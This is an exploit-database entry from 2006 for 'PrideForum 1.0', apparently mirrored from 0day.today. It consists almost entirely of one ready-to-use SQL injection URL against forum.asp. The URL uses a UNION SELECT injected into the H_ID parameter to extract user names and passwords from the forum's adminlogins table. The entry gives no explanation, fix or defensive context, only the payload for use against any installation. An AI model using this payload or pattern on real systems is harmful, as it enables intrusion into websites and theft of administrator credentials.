id: 453
date: 05/26/2006
title: PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
author: ajann
cves: 

=============================================================
PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
=============================================================




# Title  :   PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author :   ajann

# Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt




#  0day.today [2023-03-22]  #